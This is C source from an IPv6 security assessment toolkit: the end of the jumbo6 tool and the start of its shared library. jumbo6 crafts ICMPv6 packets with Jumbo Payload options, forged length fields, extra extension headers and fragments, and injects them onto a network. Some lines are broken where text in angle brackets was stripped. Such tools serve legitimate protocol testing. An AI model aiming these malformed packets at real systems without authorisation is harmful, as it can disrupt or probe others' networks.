ntohl(pkt_icmp6->icmp6_pptr)); break; } } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ struct dlt_null *dlt_null; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB && idata->flags != IFACE_LOOPBACK){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; ethernet->ether_type = htons(ETHERTYPE_IPV6); } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; /* * We include a Hop by Hop Options header that will include the Jumbo Payload option. * The user may specify additionaly HBH option headers. */ *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; ptr++; *ptr= 0; /* HBH len */ ptr++; *ptr= IP6OPT_JUMBO; /* Option type */ ptr++; *ptr= 4; /* Option length */ ptr++; jplengthptr= (u_int32_t *) ptr; ptr+=4; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+ETH_DATA_LEN)){ puts("Unfragmentable part too large for current MTU (1500 bytes)"); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ bzero(&fraghdr, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = 0; icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr+= sizeof(struct icmp6_hdr); for(i=0; i< (icmp6psize/4); i++){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); } icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); startofprefixes=ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Neighbor Advertisement Message, and * send the attack packet(s). */ int send_packet(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata){ ptr= startofprefixes; if(!fragh_f){ if(ip6length_f) ipv6->ip6_plen= htons(ip6length); else ipv6->ip6_plen= htons(0); if(jplength_f) *jplengthptr= htonl(jplength); else *jplengthptr= htonl((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + ETHER_HDR_LEN); fptrend = fptr + ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; fjplengthptr= (u_int32_t *) (fptr + sizeof(struct ether_header) + sizeof(struct ip6_hdr) + 3); /* We copy everything from the Ethernet header till the end of the Unfragmentable part */ memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); /* Check whether there is still room to add a Fragmentation Header */ if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } /* Copy the Fragmentation Header */ memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if(ip6length_f) fipv6->ip6_plen = htons(ip6length); else fipv6->ip6_plen= htons(0); if(jplength_f) *fjplengthptr= htonl(jplength); else *fjplengthptr= htonl((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } /* Sending fragments */ } /* Sending fragmented datagram */ return(0); } /* * Function: usage() * * Prints the syntax of the jumbo6 tool */ void usage(void){ puts("usage: jumbo6 -i INTERFACE [-S LINK_SRC_ADDR] [-D LINK-DST-ADDR]\n" " [-s SRC_ADDR[/LEN]] [-d DST_ADDR] [-A HOP_LIMIT] [-H HBH_OPT_HDR_SIZE] \n" " [-U DST_OPT_U_HDR_SIZE] [-y FRAG_SIZE] [-u DST_OPT_HDR_SIZE]\n" " [-q IPV6_LENGTH] [-Q JUMBO_LENGTH] [-P PAYLOAD_SIZE] [-j PREFIX[/LEN]]\n" " [-k PREFIX[/LEN]] [-J LINK_ADDR] [-K LINK_ADDR] [-b PREFIX[/LEN]]\n" " [-g PREFIX[/LEN]] [-B LINK_ADDR] [-G LINK_ADDR] [-L | -l] [-z SECONDS]\n" " [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the jumbo6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts("jumbo6: Security assessment tool for attack vectors based on IPv6 jumbo packets\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --hop-limit, -A IPv6 Hop Limit\n" " --frag-hdr. -y Fragment Header\n" " --dst-opt-hdr, -u Destination Options Header (Fragmentable Part)\n" " --dst-opt-u-hdr, -U Destination Options Header (Unfragmentable Part)\n" " --hbh-opt-hdr, -H Hop by Hop Options Header\n" " --ipv6-length, -q IPv6 Payload Length\n" " --jumbo-length, -Q Jumbo Payload Length\n" " --payload-size, -P ICMPv6 payload size\n" " --loop, -l Send periodic Jumbo messages\n" " --sleep, -z Pause between sending Redirect messages\n" " --listen, -L Listen to incoming packets\n" " --verbose, -v Be verbose\n" " --help, -h Print help for the jumbo6 tool\n" "\n" "Programmed by Fernando Gont on behalf of CPNI (http://www.cpni.gov.uk)\n" "Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ puts( "jumbo6: Security assessment tool for attack vectors based on IPv6 Jumbo Payloads\n"); if(idata->hsrcaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else{ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, \ ((idata->srcprefix_f)?" (randomized)":" (automatically selected)")); } else puts("Ethernet Source Address: Automatically selected for each packet"); } /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, \ ((!idata->hdstaddr_f)?" (automatically selected)":"")); } if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(idata->dstaddr_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((idata->srcprefix_f)?" (randomized)":"")); } if(idata->dstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (randomized)"); for(i=0; icaplen; switch(pkt_icmp6->icmp6_type){ case ICMP6_ECHO_REPLY: /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ icmp6psize) ){ return 0; } if(pkt_icmp6->icmp6_data16[0] != htons(getpid())){ return 0; } break; case ICMP6_PARAM_PROB: /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ + sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr) + \ icmp6psize) ){ return 0; } if(pkt_icmp6_icmp6->icmp6_data16[0] != htons(getpid())){ return 0; } break; default: return 0; break; } /* Check that the Source Address of the Packet is "valid" */ if(IN6_IS_ADDR_UNSPECIFIED(&(pkt_ipv6->ip6_src))){ return 0; } if(IN6_IS_ADDR_LOOPBACK(&(pkt_ipv6->ip6_src))){ return 0; } if(IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_src))){ return 0; } /* Check that that the Destination Address of the incoming packet is one of our addresses. */ if(!is_eq_in6_addr(&(idata->srcaddr), &(pkt_ipv6->ip6_dst))){ return 0; } /* Check that the ICMPv6 checksum is correct */ if(in_chksum(pkt_ipv6, pkt_icmp6, pkt_end-((unsigned char *)pkt_icmp6), IPPROTO_ICMPV6) != 0){ return 0; } return 1; } ipv6toolkit-1.5.1/tools/jumbo6.h000066400000000000000000000001111223702747200165220ustar00rootroot00000000000000/* * Header file for the jumbo6 tool * */ #define QUERY_TIMEOUT 2 ipv6toolkit-1.5.1/tools/libipv6.c000066400000000000000000002642631223702747200167120ustar00rootroot00000000000000#include #include #include #include #ifndef __FAVOR_BSD #define __FAVOR_BSD /* This causes Linux to use the BSD definition of the TCP and UDP header fields */ #endif #include #include #include #include #include #include #include #ifdef __linux__ #include #include #include #include /* For datalink structure */ #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) #include #include #endif #include #include #include #include #include #include #include #include #include #include #include #include #include "libipv6.h" #include "ipv6toolkit.h" /* IPv6 Address Resolution */ sigjmp_buf env; unsigned int canjump; /* pcap variables */ char errbuf[PCAP_ERRBUF_SIZE]; struct bpf_program pcap_filter; #ifdef __linux__ /* Netlink requests */ struct nlrequest{ struct nlmsghdr nl; struct rtmsg rt; char buf[MAX_NLPAYLOAD]; }; #endif /* * Function: dns_decode() * * Decode a domain name from DNS wire format to an ASCII string */ int dns_decode(unsigned char *start, unsigned int size, unsigned char *ptr, \ char *out, unsigned int outsize, unsigned char **next){ unsigned char *end; char *w; unsigned int clabels=0, nlabels=0; end= start+size; w= out; while(nlabels <= MAX_DNS_LABELS){ switch((*ptr & 0xc0)){ case 0x00: /* No compression */ /* Check wether the label spans past the end of the packet */ if((ptr + *ptr) >= end) return(-1); /* Check whether there is room to write this label */ if( (w+ *ptr + 1) >=(out+outsize)) return(-1); /* Check whether this is a zero-label */ if(*ptr == 0){ ptr++; /* Check whether there is a single-label domain */ if(ptr < end){ if(*ptr == 0) ptr++; } if(w == out){ *w='.'; w++; } *w=0x00; /* null-terminate the string */ /* If we're past a compressed label, '*next' already contains the right value */ if(!clabels){ if(ptr >= end) *next= NULL; else *next=ptr; } return(0); } else{ bcopy( (ptr+1), w, *ptr); w= w + *ptr; *w= '.'; w++; ptr= ptr+ (*ptr + 1); if(ptr >= end) return(-1); } break; case 0xc0: /* Compression */ /* A compressed label ocuppies two bytes */ if( (ptr+1) >= end) return(-1); /* The next domain is the one follong the two-byte compressed label */ if(!clabels){ *next= ptr+2; if(*next >= end) *next= NULL; } clabels++; if(clabels > MAX_DNS_CLABELS){ return(-1); } ptr= start + ((((unsigned short int)(*ptr & 0x3c))<< 8) + *(ptr+1)); break; default: return(-1); } } return(0); } /* * dns_str2wire() * * Converts a DNS name to DNS wire format (uncompressed) */ int dns_str2wire(char *str, unsigned int slen, char *wire, unsigned int wlen){ char *label, *src, *dst; unsigned int llen; if(wlen < slen) return(-1); src= str; dst= wire; while(1){ llen=0; label= src; while(*src != 0 && *src != '.' && src < (str + slen)){ src++; llen++; } *dst= llen; dst++; bcopy(label, dst, llen); dst+= llen; if(*src == 0){ *dst= 0; dst++; break; } else if(src >= (str + slen)){ return(-1); } else{ src++; } } return(dst-wire); } /* * Function: ether_multicast() * * Obtains the Ethernet multicast address corresponding to an IPv6 multicast address. */ struct ether_addr ether_multicast(const struct in6_addr *ipv6addr){ unsigned int i; struct ether_addr ether; ether.a[0]=0x33; ether.a[1]=0x33; for(i=2;i<6;i++) ether.a[i]= ipv6addr->s6_addr[i+10]; return ether; } /* * Function: ether_pton() * * Convert a string (printable Ethernet Address) into binary format */ int ether_pton(const char *ascii, struct ether_addr *etheraddr, unsigned int s){ unsigned int i, a[6]; if(s < ETHER_ADDR_LEN) return 0; if(ascii){ if( sscanf(ascii,"%x:%x:%x:%x:%x:%x", &a[0], &a[1], &a[2], &a[3], &a[4], &a[5]) == 6){ for(i=0;i<6;i++) etheraddr->a[i]= a[i]; return 1; } } return 0; } /* * Function: find_ipv6_router_full() * * Finds a local router (by means of Neighbor Discovery) */ int find_ipv6_router_full(pcap_t *pfd, struct iface_data *idata){ struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct nd_router_advert *pkt_ra; unsigned char *pkt_end; unsigned char *prev_nh; volatile unsigned char *ptr; volatile unsigned char *p; size_t nw; unsigned char buffer[65556]; unsigned int rs_max_packet_size; struct ether_header *ether; unsigned char *v6buffer; struct ip6_hdr *ipv6; struct nd_router_solicit *rs; struct nd_opt_slla *sllaopt; struct nd_opt_prefix_info *pio; volatile unsigned int tries=0; volatile unsigned int foundrouter=0; struct sigaction new_sig, old_sig; unsigned char error_f=0; int result; rs_max_packet_size = idata->mtu; ether = (struct ether_header *) buffer; v6buffer = buffer + sizeof(struct ether_header); ipv6 = (struct ip6_hdr *) v6buffer; if(pcap_compile(pfd, &pcap_filter, PCAP_ICMPV6_RANS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata->verbose_f>1) printf("pcap_compile(): %s", pcap_geterr(pfd)); return(-1); } if(pcap_setfilter(pfd, &pcap_filter) == -1){ if(idata->verbose_f > 1) printf("pcap_setfilter(): %s", pcap_geterr(pfd)); return(-1); } pcap_freecode(&pcap_filter); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_src= idata->ip6_local; if ( inet_pton(AF_INET6, ALL_ROUTERS_MULTICAST_ADDR, &(ipv6->ip6_dst)) <= 0){ if(idata->verbose_f>1) puts("inet_pton(): Error converting All Routers address from presentation to network format"); return(-1); } ether->src = idata->ether; if(ether_pton(ETHER_ALLROUTERS_LINK_ADDR, &(ether->dst), sizeof(struct ether_addr)) == 0){ if(idata->verbose_f>1) puts("ether_pton(): Error converting all-nodes multicast address"); return(-1); } ether->ether_type = htons(ETHERTYPE_IPV6); prev_nh = (unsigned char *) &(ipv6->ip6_nxt); *prev_nh = IPPROTO_ICMPV6; ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if( (ptr+sizeof(struct nd_router_solicit)) > (v6buffer+rs_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while inserting Router Solicitation header"); return(-1); } rs= (struct nd_router_solicit *) (ptr); rs->nd_rs_type = ND_ROUTER_SOLICIT; rs->nd_rs_code = 0; rs->nd_rs_reserved = 0; ptr += sizeof(struct nd_router_solicit); sllaopt = (struct nd_opt_slla *) ptr; if( (ptr+sizeof(struct nd_opt_slla)) > (v6buffer+rs_max_packet_size)){ if(idata->verbose_f>1) puts("RS message too large while processing source link-layer addresss opt."); return(-1); } sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; bcopy( &(idata->ether.a), sllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); rs->nd_rs_cksum = 0; rs->nd_rs_cksum = in_chksum(v6buffer, rs, ptr-((unsigned char *)rs), IPPROTO_ICMPV6); /* We set the signal handler, and the anchor for siglongjump() */ canjump=0; bzero(&new_sig, sizeof(struct sigaction)); sigemptyset(&new_sig.sa_mask); new_sig.sa_handler= &sig_alarm; alarm(0); if( sigaction(SIGALRM, &new_sig, &old_sig) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); return(-1); } if(sigsetjmp(env, 1) != 0) tries++; canjump=1; while(tries<3 && !foundrouter && !error_f){ if((nw=pcap_inject(pfd, buffer, ptr - buffer)) == -1){ if(idata->verbose_f>1) printf("pcap_inject(): %s\n", pcap_geterr(pfd)); error_f=1; break; } if(nw != (ptr-buffer)){ if(idata->verbose_f>1) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); error_f=1; break; } alarm(idata->local_timeout + 1); while(!foundrouter && !error_f){ do{ if( (result=pcap_next_ex(pfd, &pkthdr, &pktdata)) == -1){ if(idata->verbose_f>1) printf("pcap_next_ex(): %s", pcap_geterr(pfd)); error_f=1; break; } }while(result==0); if(error_f) break; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_ra = (struct nd_router_advert *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_ra + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ra + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain a Router Advertisement message with a source link-layer address option */ if( (pkt_end - (unsigned char *) pkt_ra) < (sizeof(struct nd_router_advert) + \ sizeof(struct nd_opt_slla))) continue; /* Neighbor Discovery packets must have a Hop Limit of 255 */ if(pkt_ipv6->ip6_hlim != 255) continue; /* Check that the IPv6 Source Address of the Router Advertisement is an IPv6 link-local address. */ if( (pkt_ipv6->ip6_src.s6_addr16[0] & htons(0xffc0)) != htons(0xfe80)) continue; /* Check that that the Destination Address of the Router Advertisement is either the one that we used for sending the Router Solicitation message or a multicast address (typically the all-nodes) */ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(ipv6->ip6_src)) \ && !IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_dst))) continue; /* Check that the ICMPv6 checksum is correct. If the received checksum is valid, and we compute the checksum over the received packet (including the Checksum field) the result is 0. Otherwise, the packet has been corrupted. */ if(in_chksum(pkt_ipv6, pkt_ra, pkt_end- (unsigned char *)pkt_ra, IPPROTO_ICMPV6) != 0) continue; p= (unsigned char *) pkt_ra + sizeof(struct nd_router_advert); /* Process Router Advertisement options */ while( (p+ *(p+1) * 8) <= pkt_end && *(p+1)!=0 && !error_f){ switch(*p){ case ND_OPT_SOURCE_LINKADDR: if( (*(p+1) * 8) != sizeof(struct nd_opt_tlla)) break; /* Got a response, so we shouln't time out */ alarm(0); /* Save the link-layer address */ idata->router_ether = *(struct ether_addr *) (p+2); idata->router_ip6= pkt_ipv6->ip6_src; foundrouter=1; break; case ND_OPT_PREFIX_INFORMATION: if(*(p+1) != 4) break; pio= (struct nd_opt_prefix_info *) p; if((idata->prefix_ol.nprefix) < idata->prefix_ol.maxprefix){ if( (pio->nd_opt_pi_flags_reserved & ND_OPT_PI_FLAG_ONLINK) && \ (pio->nd_opt_pi_prefix_len <= 128) && !is_ip6_in_prefix_list(&(pio->nd_opt_pi_prefix), \ &(idata->prefix_ol))){ if( (idata->prefix_ol.prefix[idata->prefix_ol.nprefix] = \ malloc(sizeof(struct prefix_entry))) == NULL){ if(idata->verbose_f>1) puts("Error in malloc() while learning prefixes"); error_f=1; break; } (idata->prefix_ol.prefix[idata->prefix_ol.nprefix])->ip6= pio->nd_opt_pi_prefix; (idata->prefix_ol.prefix[idata->prefix_ol.nprefix])->len= pio->nd_opt_pi_prefix_len; sanitize_ipv6_prefix(&((idata->prefix_ol.prefix[idata->prefix_ol.nprefix])->ip6), \ (idata->prefix_ol.prefix[idata->prefix_ol.nprefix])->len); (idata->prefix_ol.nprefix)++; } } /* We expect the autoconfiguration prefix to have a length between 32 and 64 bits. We used to require it to be 64-bits long, but some routers have been found to advertise 48-bit long prefixes. Hence, we have relaxed the allowed length. */ if(idata->prefix_ac.nprefix < idata->prefix_ac.maxprefix){ if( (pio->nd_opt_pi_flags_reserved & ND_OPT_PI_FLAG_AUTO) && \ (pio->nd_opt_pi_prefix_len >= 32 && pio->nd_opt_pi_prefix_len <= 64) && \ !is_ip6_in_prefix_list(&(pio->nd_opt_pi_prefix), &(idata->prefix_ac))){ if((idata->prefix_ac.prefix[idata->prefix_ac.nprefix] = \ malloc(sizeof(struct prefix_entry))) == NULL){ if(idata->verbose_f>1) puts("Error in malloc() while learning prefixes"); error_f=1; break; } (idata->prefix_ac.prefix[idata->prefix_ac.nprefix])->ip6= \ pio->nd_opt_pi_prefix; /* If the prefix is valid, we assume it to be 64-bit long. In the past, we used the length advertised by pio->nd_opt_pi_prefix_len. */ (idata->prefix_ac.prefix[idata->prefix_ac.nprefix])->len= 64; sanitize_ipv6_prefix(&((idata->prefix_ac.prefix[idata->prefix_ac.nprefix])->ip6), \ (idata->prefix_ac.prefix[idata->prefix_ac.nprefix])->len); if(!idata->ip6_global_flag && idata->ip6_global.nprefix < idata->ip6_global.maxprefix){ if( (idata->ip6_global.prefix[idata->ip6_global.nprefix] = \ malloc(sizeof(struct prefix_entry))) == NULL){ if(idata->verbose_f>1) puts("Error in malloc() creating local SLAAC addresses"); error_f=1; break; } generate_slaac_address(&(idata->prefix_ac.prefix[idata->prefix_ac.nprefix]->ip6), \ &(idata->ether), &((idata->ip6_global.prefix[idata->ip6_global.nprefix])->ip6)); (idata->ip6_global.prefix[idata->ip6_global.nprefix])->len = 64; (idata->ip6_global.nprefix)++; } (idata->prefix_ac.nprefix)++; } } break; default: break; } p= p + *(p+1) * 8; } /* Processing options */ } /* Processing packets */ } /* Resending Router Solicitations */ /* If we added at least one global address, we set the corresponding flag to 1 */ if(idata->ip6_global.nprefix) idata->ip6_global_flag=1; if( sigaction(SIGALRM, &old_sig, NULL) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); return(-1); } if(foundrouter) return 1; else return 0; } /* * Function: ether_ntop() * * Convert binary Ethernet Address into printable foramt (an ASCII string) */ int ether_ntop(const struct ether_addr *ether, char *ascii, size_t s){ unsigned int r; if(s < ETHER_ADDR_PLEN) return 0; r=snprintf(ascii, s, "%02x:%02x:%02x:%02x:%02x:%02x", ether->a[0], ether->a[1], ether->a[2], ether->a[3], \ ether->a[4], ether->a[5]); if(r != 17) return 0; return 1; } /* * Function: ether_to_ipv6_linklocal() * * Generates an IPv6 link-local address (with modified EUI-64 identifiers) based on * an Ethernet address. */ void ether_to_ipv6_linklocal(struct ether_addr *etheraddr, struct in6_addr *ipv6addr){ unsigned int i; ipv6addr->s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=1;i<4;i++) ipv6addr->s6_addr16[i]=0x0000; ipv6addr->s6_addr16[4]= htons(((u_int16_t)etheraddr->a[0] << 8) | etheraddr->a[1]); ipv6addr->s6_addr16[5]= htons( ((u_int16_t)etheraddr->a[2] << 8) | 0xff); ipv6addr->s6_addr16[6]= htons((u_int16_t) 0xfe00 | etheraddr->a[3]); ipv6addr->s6_addr16[7]= htons(((u_int16_t)etheraddr->a[4] << 8) | etheraddr->a[5]); } /* * Function match_ipv6() * * Finds if an IPv6 address matches a prefix in a list of prefixes. */ unsigned int match_ipv6(struct in6_addr *prefixlist, u_int8_t *prefixlen, unsigned int nprefix, struct in6_addr *ipv6addr){ unsigned int i, j; struct in6_addr dummyipv6; for(i=0; ia[j] != addrlist[i].a[j]) break; if(j==6) return 1; } return 0; } /* * Function: in_chksum() * * Calculate the 16-bit ICMPv6 checksum */ u_int16_t in_chksum(void *ptr_ipv6, void *ptr_icmpv6, size_t len, u_int8_t proto){ struct ipv6pseudohdr pseudohdr; struct ip6_hdr *v6packet; size_t nleft; unsigned int sum = 0; u_int16_t *w; u_int16_t answer = 0; v6packet=ptr_ipv6; bzero(&pseudohdr, sizeof(struct ipv6pseudohdr)); pseudohdr.srcaddr= v6packet->ip6_src; pseudohdr.dstaddr= v6packet->ip6_dst; pseudohdr.len = htons(len); pseudohdr.nh = proto; nleft=40; w= (u_int16_t *) &pseudohdr; while(nleft > 1){ sum += *w++; nleft -= 2; } nleft= len; w= (u_int16_t *) ptr_icmpv6; while(nleft > 1){ sum += *w++; nleft -= 2; } if(nleft == 1){ *(unsigned char *) (&answer) = *(unsigned char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } /* * Function: inset_pad_opt() * * Insert a padding option (Pad1 or PadN) into an IPv6 extension header */ int insert_pad_opt(unsigned char *ptrhdr, const unsigned char *ptrhdrend, unsigned int padn){ unsigned char *ptr; if( (ptrhdrend - ptrhdr) < padn) return 0; if(padn == 1){ *ptrhdr= 0x00; return 1; } else{ ptr=ptrhdr; *ptr= 0x01; ptr++; *ptr= padn-2; ptr+=2; while(ptr < (ptrhdr+padn)){ *ptr= 0x00; ptr++; } return 1; } } /* * Function: ipv6_to_ether() * * Obtains the Ethernet address corresponding to an IPv6 address (by means of Neighbor Discovery) */ int ipv6_to_ether(pcap_t *pfd, struct iface_data *idata, struct in6_addr *targetaddr, struct ether_addr *result_ether){ struct bpf_program pcap_filter; struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct nd_neighbor_advert *pkt_na; unsigned char *pkt_end, *prev_nh; volatile unsigned char *ptr, *p; unsigned char buffer[65556]; unsigned int ns_max_packet_size; struct ether_header *ether; unsigned char *v6buffer; struct ip6_hdr *ipv6; struct nd_neighbor_solicit *ns; struct nd_opt_slla *sllaopt; 